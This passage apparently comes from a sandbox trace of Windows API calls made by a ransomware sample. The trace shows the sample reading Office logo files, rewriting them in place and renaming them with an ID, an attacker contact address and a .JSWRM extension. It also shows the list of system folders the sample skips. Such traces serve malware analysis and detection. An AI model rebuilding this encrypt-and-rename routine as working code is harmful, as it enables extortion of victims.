CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.661] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1496) returned 1 [0132.661] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.661] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5d0, lpOverlapped=0x0) returned 1 [0132.663] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.663] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5d0, lpOverlapped=0x0) returned 1 [0132.663] CloseHandle (hObject=0x238) returned 1 [0132.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.664] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.scale-140.png", cAlternateFileName="FIFE2A~1.PNG")) returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2=".") returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="..") returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="...") returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="windows") returned -1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0132.664] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-140.png", lpString2="msocache") returned -1 [0132.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x2411f0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0132.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x2413d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0132.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.665] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1694) returned 1 [0132.665] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.666] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x690, lpOverlapped=0x0) returned 1 [0132.667] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.667] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x690, lpOverlapped=0x0) returned 1 [0132.667] CloseHandle (hObject=0x238) returned 1 [0132.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.668] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.scale-180.png", cAlternateFileName="FIA1A5~1.PNG")) returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2=".") returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="..") returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="...") returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="windows") returned -1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0132.671] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-180.png", lpString2="msocache") returned -1 [0132.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0132.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0132.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.673] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2048) returned 1 [0132.673] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.673] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0132.674] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.674] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0132.674] CloseHandle (hObject=0x238) returned 1 [0132.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.675] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x537, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.scale-80.png", cAlternateFileName="FIED60~1.PNG")) returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2=".") returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="..") returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="...") returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="windows") returned -1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0132.676] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-80.png", lpString2="msocache") returned -1 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.677] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1335) returned 1 [0132.677] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.677] ReadFile (in: hFile=0x238, lpBuffer=0x21af28, nNumberOfBytesToRead=0x530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesRead=0x345e89c*=0x530, lpOverlapped=0x0) returned 1 [0132.678] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.678] WriteFile (in: hFile=0x238, lpBuffer=0x21af28*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21af28*, lpNumberOfBytesWritten=0x345e898*=0x530, lpOverlapped=0x0) returned 1 [0132.679] CloseHandle (hObject=0x238) returned 1 [0132.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.680] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-black_scale-100.png", cAlternateFileName="GROOVE~1.PNG")) returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.680] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-100.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-100.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 39 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-100.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-100.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 39 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.681] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2291) returned 1 [0132.681] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.681] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0132.683] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.683] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0132.683] CloseHandle (hObject=0x238) returned 1 [0132.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.684] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-black_scale-140.png", cAlternateFileName="GROOVE~2.PNG")) returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.684] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-140.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-140.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 39 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-140.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-140.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 39 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.684] CreateFileW 